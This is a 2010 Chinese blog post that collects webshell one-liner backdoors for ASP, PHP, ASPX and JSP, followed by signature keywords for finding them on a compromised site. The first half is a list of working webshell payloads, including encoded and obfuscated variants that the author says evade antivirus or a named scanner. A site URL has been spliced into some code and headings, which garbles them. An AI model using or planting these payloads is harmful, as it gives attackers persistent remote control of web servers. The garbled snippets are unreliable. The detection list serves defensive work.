收集一些常见的webshell后门的特征码

收集一些常见的webshell后门的特征码

2010-02-26 21:17 3791人阅读 评论(0) 收藏 举报

vbscriptcmdsystem正则表达式phpasp

一些常见的webshell（asp,aspx,php,jsp等）后门木马。

什么是一句话木马？不了解的朋友百度一下。

一句话木马具体有以下这些，这些都是自己平时收集的。（当然收集不齐全，希望大家帮忙完善～）

============================

asp一句话木马：

<%%25Execute(request("a"))%%25>

<%Execute(request("a"))%>

%><%execute request("a")%><%

<script language=VBScript runat=server>execute request("a")</script>

<%25Execute(request("a"))%25>

%><%execute request("yy")%>

<%execute request(char(97))%>

<%eval request(char(97))%>

":execute request("value"):a="

<script language=VBScript runat=server>if request(chr(35))<>"""" then

ExecuteGlobal request(chr(35))

</script>

在数据库里插入的一句话木马

┼攠數畣整爠煥敵瑳∨∣┩愾

┼癥污爠煥敵瑳∨≡┩> 密码为: a

utf-7的马

<%@ codepage=65000%>

<% response.Charset="936"%>

<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%> Script Encoder 加密

<%@ LANGUAGE = VBScript.Encode %>

<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+

P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>

可以躲过雷客图的一句话。

<%

set ms = server.CreateObject("MSScriptControl.ScriptControl.1")

http://www.77cn.com.cnnguage="VBScript"

ms.AddObject "Response", Response

ms.AddObject "request", request

ms.ExecuteStatement("ev"&"al(request(""1""))")

%>

php一句话

<? php eval($_POST[cmd]);?>

<?php eval($_POST[cmd]);?>

<?php system($_REQUEST['cmd']);?>

<?php eval($_POST[1]);?>

aspx一句话

<script language="C#" runat="server">

WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");

</script>

JSP一句话后门

<%

if(request.getParameter("f")!=null)(new

java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());

%>

================================我是邪恶的分界线

==============================

为什么收集这些东东？

有些站长说，webshell找到了，服务器打了补丁，网站漏洞也给补上了。甚至把整个web目录所有的文件都检查了多次，都没找到可疑的文件。为什么黑客还是让网站挂上木马了？ 猜也猜得到拉，被放后门呗！那后门在哪？比较简单而且有效的方法当然是在正常文件里写入一句话木马了，以后连接上去就是了。况且杀毒软件对某些一句话木马不敏感，这个，玩黑的朋友都知道了～

也许你会问，能不能彻底把后门挖出来？这个难说~我就不敢保证了，哈哈。。。 不过下面这些或许对你有帮助。

下面整理了一些webshell后门的特征码（搜索的时候不要区分大小写）：

aspshell

Execute(request

execute request(

eval request(

"ev"&"al(request(

ExecuteGlobal request

┼癥污爠煥敵瑳∨≡┩>

┼攠數畣整爠煥敵瑳∨∣┩愾

SqlRootkit

专用小马

小马

整站文件打包

确认解包吗

dama

不要干坏事

hack

fuck

郁闷，权限不够估计不能执行命令！

php木马特征：

base64

base64_decode

angle

<? php eval($_POST[cmd]);?>

<?php eval($_POST[

<?php system($_REQUEST['cmd']);?>

<?php system($_REQUEST[

phpspy

Scanners

打包下载

打包程序扩展名

http://www.77cn.com.cn木马特征：

ASPXSpy

专用小马

rootkit

JFolder （我就只有这个。。。）

以上面这些作为特征码，用这个工具advanced find and replace 搜索可疑的文件，或许会找出点邪恶的东西，还工具还可以批量清马，并支持正则表达式，站长必备工具，呵呵！ 当然还可以按文件修改时间进行搜索可疑文件，不过有些webshell支持文件属性修改。 AFR下载地址：

之前转了个文章，这里有介绍